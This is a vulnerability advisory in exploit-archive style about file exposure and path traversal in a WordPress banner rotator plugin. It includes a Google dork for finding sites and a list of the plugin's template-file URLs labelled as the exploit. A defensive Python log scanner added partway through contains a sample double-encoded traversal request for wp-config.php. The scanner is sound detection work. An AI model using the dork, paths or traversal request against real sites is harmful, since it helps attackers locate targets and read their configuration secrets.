###############################################################################
# Exploit Title : WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
# Software Download Link : downloads.wordpress.org/plugin/all-in-one-slider.zip
# Software Information Links : responsivejqueryslider.com/banner_rotator.html
+ responsivejqueryslider.com/wordpressplugin/banner_rotator_responsive.html
+ codecanyon.net/item/all-in-one-slider-responsive-jquery-slider-plugin/1534434?ref=LambertGroup
+ lambertgroupproductions.com/portfolio_page/one-slider-responsive-jquery-slider-plugin/
# Software Price : $11
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : 1.1 - 3.0 - 3.2 - 3.5.0 - 4.7.12 - 4.9.9
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
###############################################################################
# Impact :
***********
* The WordPress all_in_one_bannerRotator plugin, version 4.9.9 and other versions, is prone to an arbitrary file disclosure
vulnerability because it fails to properly sanitize user-supplied input.
* An attacker can exploit this vulnerability to view local files in the context of the web server process,
which may aid in launching further attacks.
* An information exposure is the intentional or unintentional disclosure
of information to an actor that is not explicitly authorized to have access to that information.
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* The software uses external input to construct a pathname that is intended to identify a file or
directory located underneath a restricted parent directory, but the software does not
properly neutralize special elements within the pathname, so the pathname can
resolve to a location outside of the restricted directory.
###############################################################################
# Video Tutorials =>
*******************
Step 1: Installation – youtube.com/watch?v=D8rQdXzEz0o
Step 2: Manage Images – youtube.com/watch?v=ULrPCuP0rnQ
Step 3: Manage Text Over Image – youtube.com/watch?v=4KqgWBmx8RA
Step 4: Manage Multiple Banners – youtube.com/watch?v=y2wnD3hUdus
###############################################################################
# Exploit :
*************
/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners
/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/help.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New
/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners
/wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help
/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist
/wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php
/wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html
/wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php
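Added defender-side example, not part of the advisory: a small Python scanner that reads web-server access-log lines (combined log format) and flags direct requests to the plugin's tpl/ directory listed above, as well as URL-encoded path-traversal sequences of the CWE-22 kind described in the Impact section. The log lines, IP addresses and the `/index.php?file=` request are constructed for the example.

```python
import re
from urllib.parse import unquote

# Template directory of the plugin named in the advisory; its .php files are
# not meant to be requested directly by site visitors.
PLUGIN_TPL_DIR = "/wp-content/plugins/all_in_one_bannerRotator/tpl/"

# Combined log format: ip ident user [time] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (TEST-NET addresses, made-up timestamps).
SAMPLE_LOG = """
192.0.2.10 - - [14/Jan/2019:10:00:01 +0000] "GET /blog/2019/hello-world/ HTTP/1.1" 200 5120
192.0.2.11 - - [14/Jan/2019:10:00:02 +0000] "GET /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php HTTP/1.1" 500 311
192.0.2.11 - - [14/Jan/2019:10:00:03 +0000] "GET /wp-content/plugins/all_in_one_bannerRotator//tpl/overview.php?page=all_in_one_bannerRotator_Help HTTP/1.1" 200 2048
192.0.2.12 - - [14/Jan/2019:10:00:04 +0000] "GET /index.php?file=..%252F..%252Fwp-config.php HTTP/1.1" 404 209
""".strip().splitlines()


def classify(path):
    """Return the list of reasons a request path is suspicious (empty if none)."""
    # Decode twice so that both %2F and double-encoded %252F collapse to "/".
    decoded = unquote(unquote(path))
    # Treat backslashes as slashes and collapse "//" (see the "//tpl/" variant
    # in the advisory's example list) before matching.
    norm = re.sub(r"/{2,}", "/", decoded.replace("\\", "/"))
    reasons = []
    if PLUGIN_TPL_DIR in norm:
        reasons.append("direct request to plugin template file")
    if "../" in norm:
        reasons.append("path traversal sequence")
    return reasons


def scan(lines):
    """Parse log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        reasons = classify(m.group("path"))
        if reasons:
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status")), "reasons": reasons})
    return hits
```

The status code is kept in each record because a direct template request that answers 200 and one that answers 500 warrant different follow-up when checking what the server returned.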
###############################################################################
# Example Vulnerable Sites :
****************************
###############################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################